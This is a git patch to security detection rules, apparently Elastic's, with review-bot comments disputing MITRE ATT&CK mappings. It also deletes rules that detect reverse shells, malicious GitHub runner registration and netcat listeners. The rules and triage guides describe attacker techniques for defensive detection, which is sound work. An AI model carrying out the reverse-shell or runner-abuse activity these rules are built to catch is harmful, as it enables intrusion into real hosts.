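Review bot: The new Lateral Movement entry in lateral_movement_wmic_remote.toml uses subtechnique T1021.006 Windows Remote Management in place of the removed T1021.003 Distributed Component Object Model, which does not match how a remote WMIC command reaches its target: WMI remoting runs over DCOM/RPC, while WinRM is the transport for PowerShell remoting, not for wmic.exe. The removed block had the right subtechnique, so this looks like a copy of the identical T1021.006 block from lateral_movement_posh_winrm_activity.toml (earlier on this patch) rather than a deliberate re-mapping. Restore `id = "T1021.003"`, `name = "Distributed Component Object Model"` and `reference = "https://attack.mitre.org/techniques/T1021/003/"` in the added subtechnique; the T1047 / TA0002 entry kept as context is fine.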
@@ -43,18 +43,29 @@ event.dataset: aws.cloudtrail and event.provider: "iam.amazonaws.com" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/persistence_github_new_pat_for_user.toml index 74a5af6d46e..a65b0128137 100644 --- a/rules_building_block/persistence_github_new_pat_for_user.toml +++ b/rules_building_block/persistence_github_new_pat_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of Personal Access Token (PAT) Use For a GitHub User" risk_score = 21 rule_id = "f94e898e-94f1-4545-8923-03e4b2866211" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" 
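Review bot: The hunk for persistence_aws_iam_login_profile_added_to_user.toml swaps the subtechnique from T1098.001 Additional Cloud Credentials to T1098.003 Additional Cloud Roles, but creating a login profile gives an IAM user a console password — a new credential, not a new role or permission set — so the original subtechnique was the accurate one. The opposite swap is made two lines down in persistence_github_new_user_added_to_organization.toml (T1098.003 → T1098.001), where adding a member to an organization grants membership and roles rather than credentials, so the two edits read as though they were applied to each other's files. Unless the commit message gives a reason, keep `T1098.001` here and `T1098.003` there. The T1078 / T1078.004 technique added in this same hunk is worth confirming too: the `iam.amazonaws.com` CloudTrail context records the profile being added, not a logon with it.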
@@ -30,21 +37,22 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.hashed_token"] diff --git a/rules_building_block/persistence_github_new_user_added_to_organization.toml b/rules_building_block/persistence_github_new_user_added_to_organization.toml index 0afb472c332..ebf6de67223 100644 --- a/rules_building_block/persistence_github_new_user_added_to_organization.toml +++ b/rules_building_block/persistence_github_new_user_added_to_organization.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -35,18 +35,19 @@ configuration where event.dataset == "github.audit" and event.action == "org.add [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index 79e94ce2457..e4a2ed6fd5e 100644 --- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/11/07" [rule] author = ["Elastic"] @@ -84,12 +84,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" 
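Review bot: Switching the sub-technique from T1098.003 Additional Cloud Roles to T1098.001 Additional Cloud Credentials looks like a weaker fit for a rule whose query context is `event.action == "org.add…`: adding a member to a GitHub organization grants membership and roles, it does not mint a credential. T1098.003 covers granting additional roles or permissions to an account, and T1136.003 Create Account: Cloud Account is the other candidate if the rule is meant to catch onboarding of attacker-controlled users; either reads closer to the event than .001. Only the threat block is visible here, so if the description elsewhere in the file was reworked around credential issuance, disregard this.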
@@ -100,30 +108,17 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/persistence_startup_folder_lnk.toml b/rules_building_block/persistence_startup_folder_lnk.toml index ac4429fcf95..0cfb8ff93eb 100644 --- a/rules_building_block/persistence_startup_folder_lnk.toml +++ b/rules_building_block/persistence_startup_folder_lnk.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
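Review bot: After this hunk the second `[[rule.threat]]` block in persistence_iam_instance_request_to_iam_service.toml keeps `framework = "MITRE ATT&CK"` and the TA0004 Privilege Escalation tactic but no longer has any `[[rule.threat.technique]]` — T1098 and both sub-techniques were removed from it while the Persistence block above still carries them. If the aim was to stop listing T1098 twice, note that ATT&CK maps T1098 Account Manipulation to both Persistence and Privilege Escalation, so the repetition was legitimate; a tactic-only entry appears to be accepted by the schema but gives downstream consumers no technique to correlate on. Either restore T1098 under TA0004 or drop the empty block together with its `Tactic: Privilege Escalation` tag, if the tags list (not shown in this diff) still carries it.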
@@ -48,18 +48,24 @@ file where host.os.type == "windows" and event.type != "deletion" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/persistence_transport_agent_exchange.toml b/rules_building_block/persistence_transport_agent_exchange.toml index d5f3bc49190..cbc31115a3e 100644 --- a/rules_building_block/persistence_transport_agent_exchange.toml +++ b/rules_building_block/persistence_transport_agent_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -84,18 +84,36 @@ case_insensitive = true value = "?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\tmp_????????.???\\\\tmp_????????.???.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" - [[rule.threat.technique.subtechnique]] id = "T1505.002" name = "Transport Agent" reference = "https://attack.mitre.org/techniques/T1505/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml index 93d46c613b7..a6611cbeb3b 100644 --- a/rules_building_block/persistence_web_server_potential_sql_injection.toml +++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/16" [rule] author = ["Elastic"] 
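Review bot: A second `[[rule.threat]]` block for Execution (T1059.001 PowerShell, TA0002) is added, but no hunk in persistence_transport_agent_exchange.toml touches the `tags` list — the only other hunk is the `updated_date` change. Unless the existing tags already contain `Tactic: Execution`, the rule's tags and its threat tactics now disagree, which any check that each MITRE tactic in `threat` has a matching `Tactic:` tag would flag; adding `"Tactic: Execution",` to `tags` in the same change closes the gap. The `.ps?1` file-name context in the hunk header makes the PowerShell sub-technique itself a reasonable addition.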
@@ -28,7 +28,21 @@ name = "Web Server Potential SQL Injection Request" risk_score = 21 rule_id = "7f7a0ee1-7b6f-466a-85b4-110fb105f5e2" severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Rule Type: BBR"] +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
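Review bot: `"Tactic: Credential Access",` is added to `tags`, but the threat blocks added for this rule in the following `@@ -48,14 +62,45 @@` and `@@ -70,6 +115,11 @@` hunks map only Persistence, Execution, Command and Control and Reconnaissance; the eight unchanged lines between those two hunks have room for the existing T1595 technique header and little else, so there appears to be no Credential Access `[rule.threat.tactic]` backing the tag. Either drop the tag or add the matching `[[rule.threat]]` block with the technique the SQL-injection behaviour is meant to represent. The removal of `Tactic: Initial Access` from this list, by contrast, is consistent with its threat block being removed.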
@@ -48,14 +62,45 @@ any where url.original like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -70,6 +115,11 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml index 681676e92cf..3141a9913dc 100644 --- a/rules_building_block/persistence_web_server_sus_file_creation.toml 
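Review bot: Dropping T1190 Exploit Public-Facing Application (Initial Access) from a rule that matches injection patterns in `url.original` removes the technique whose ATT&CK description names SQL injection explicitly, while the replacements are looser fits: T1505 Server Software Component is used without a sub-technique (a dropped web shell would be T1505.003, which a request-log rule does not observe), and T1071 Application Layer Protocol describes command-and-control traffic rather than an injected request. If the goal is to tag the post-exploitation outcomes this building-block rule is meant to feed, keeping T1190 as the primary mapping and adding the others alongside it reads better than replacing it. The T1595.003 Wordlist Scanning addition in the `@@ -70,6 +115,11 @@` hunk is consistent with the retained Reconnaissance tactic.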
+++ b/rules_building_block/persistence_web_server_sus_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -47,7 +47,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "esql" @@ -120,3 +129,34 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml index 619231cfd90..39bc5a78dcd 100644 --- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml +++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/03" [rule] author = ["Austin Songer", "Elastic"] @@ -68,7 +68,17 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessio risk_score = 21 rule_id = "b45ab1d2-712f-4f01-a751-df3826969807" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" 
@@ -82,21 +92,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.investigation_fields] field_names = [ "@timestamp", From c1f5d0c5db19c35caf1b6556457bc591d790ca1d Mon Sep 17 00:00:00 2001 
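Review bot: The added Privilege Escalation block uses the parent technique T1548 Abuse Elevation Control Mechanism, whose named sub-techniques are mostly host elevation controls (setuid, UAC, sudo); for an STS `GetSessionToken` call the sub-technique T1548.005 Temporary Elevated Cloud Access is the closer match, provided the project's ATT&CK data version includes it. The `tags` hunk for this file does add both `Tactic: Privilege Escalation` and `Tactic: Lateral Movement` and drops `Tactic: Defense Evasion`, so tags and threat tactics stay in agreement after this change.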
From: Mika Ayenson Date: Tue, 24 Mar 2026 13:46:52 -0500 Subject: [PATCH 10/16] remove renamed files --- ...ontrol_register_github_actions_runner.toml | 108 ------- ..._and_control_revershell_via_shell_cmd.toml | 111 ------- ...ss_followed_by_kubernetes_api_request.toml | 113 ------- ...er_tracking_id_tampering_via_env_vars.toml | 121 -------- ...rnetes_api_request_by_usual_utilities.toml | 112 ------- ...ct_interactive_kubernetes_api_request.toml | 116 -------- ...tes_api_activity_by_unusual_utilities.toml | 164 ----------- ..._server_local_file_inclusion_activity.toml | 177 ----------- ...server_remote_file_inclusion_activity.toml | 116 -------- ...ersistence_sap_netweaver_jsp_webshell.toml | 75 ----- ..._files_compression_inside_a_container.toml | 141 --------- ..._creation_execution_deletion_sequence.toml | 147 ---------- ...e_creation_in_system_binary_locations.toml | 93 ------ ...stener_established_inside_a_container.toml | 115 -------- ...payload_downloaded_and_piped_to_shell.toml | 119 -------- ...ccess_kubelet_certificate_file_access.toml | 101 ------- ...ecutable_via_chmod_inside_a_container.toml | 103 ------- ...ct_interactive_kubernetes_api_request.toml | 143 --------- ...n_suspicious_echo_or_printf_execution.toml | 174 ----------- ...ous_webserver_child_process_execution.toml | 275 ------------------ ...irect_kubelet_access_via_process_args.toml | 94 ------ tests/test_all_rules.py | 118 ++++---- 22 files changed, 57 insertions(+), 2779 deletions(-) delete mode 100644 rules/cross-platform/command_and_control_register_github_actions_runner.toml delete mode 100644 rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml delete mode 100644 rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml delete mode 100644 rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml delete mode 100644 
rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml delete mode 100644 rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml delete mode 100644 rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml delete mode 100644 rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml delete mode 100644 rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml delete mode 100644 rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml delete mode 100644 rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml delete mode 100644 rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml delete mode 100644 rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml delete mode 100644 rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml delete mode 100644 rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml delete mode 100644 rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml delete mode 100644 rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml 
diff --git a/rules/cross-platform/command_and_control_register_github_actions_runner.toml b/rules/cross-platform/command_and_control_register_github_actions_runner.toml deleted file mode 100644 index 68bacee30b4..00000000000 --- a/rules/cross-platform/command_and_control_register_github_actions_runner.toml +++ /dev/null 
@@ -1,108 +0,0 @@ -[metadata] -creation_date = "2025/11/26" -integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the configuration of a GitHub Actions self-hosted runner using the Runner.Listener binary. -When a machine is registered to a remote repository, its owner gains the ability to execute arbitrary workflow commands on that host. -Unexpected or unauthorized runner registration may indicate adversarial activity aimed at establishing remote code execution -via malicious GitHub workflows. -""" -false_positives = [ - "Authorized github repository with no malicious workflow actions.", -] -from = "now-9m" -index = [ - "endgame-*", - "logs-crowdstrike.fdr*", - "logs-endpoint.events.process-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-system.security*", - "logs-windows.forwarded*", - "logs-windows.sysmon_operational-*", - "winlogbeat-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" -] -language = "eql" -license = "Elastic License v2" -name = "Remote GitHub Actions Runner Registration" -note = """## Triage and analysis - -### Investigating Remote GitHub Actions Runner Registration - -Unexpected or unauthorized Github actions runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows. - -### Possible investigation steps - -- Review the remote repository details and reputation. -- Examine the remote repository for any suspicious workflows run commands in the `.github/workflows` folder. -- Examine the execution context like process tree, associated network and file activities. -- Verify if there is adjascent any sensitive file access or collection. -- Correlate with other alerts and investiguate if this activity is related to a supply chain attack. 
- -### False positive analysis - -- Authorized configuration changes. - -### Response and remediation - -- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement. -- Terminate any suspicious child processes that were initiated by the registered Github actions runner. -- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise. -- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed. -- Implement application whitelisting to prevent unauthorized execution. -- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.""" -references = [ - "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", - "https://socket.dev/blog/shai-hulud-strikes-again-v2", -] -risk_score = 47 -rule_id = "57e118c1-19eb-4c20-93a6-8a6c30a5b48b" -severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Auditd Manager", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" - -query = ''' -process where event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and - process.name in ("Runner.Listener", "Runner.Listener.exe") and - process.args == "configure" and process.args == "--url" and process.args == "--token" -''' - - -[[rule.threat]] -framework = "MITRE ATT&CK" - 
-[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" - -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml b/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml deleted file mode 100644 index 2b950a5e42a..00000000000 --- a/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml +++ /dev/null 
@@ -1,111 +0,0 @@ -[metadata] -creation_date = "2020/01/07" -integration = ["endpoint"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity." -from = "now-9m" -index = ["auditbeat-*", "logs-endpoint.events.*"] -language = "eql" -license = "Elastic License v2" -name = "Potential Reverse Shell Activity via Terminal" -note = """## Triage and analysis - -### Investigating Potential Reverse Shell Activity via Terminal - -A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. - -This rule identifies commands that are potentially related to reverse shell activities using shell applications. - -#### Possible investigation steps - -- Examine the command line and extract the target domain or IP address information. - - Check if the domain is newly registered or unexpected. - - Check the reputation of the domain or IP address. - - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. -- Investigate other alerts associated with the user/host during the past 48 hours. -- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. -- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. - -### False positive analysis - -- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. - -### Response and remediation - -- Initiate the incident response process based on the outcome of the triage. -- Isolate the involved host to prevent further post-compromise behavior. -- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. -- Take actions to terminate processes and connections used by the attacker. -- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. -- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. -- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). -""" -references = [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - "https://github.com/WangYihang/Reverse-Shell-Manager", - "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/", - "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security", -] -risk_score = 73 -rule_id = "a1a0375f-22c2-48c0-81a4-7c2d11cc6856" -setup = """## Setup - -If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, -events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. -Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate -`event.ingested` to @timestamp. 
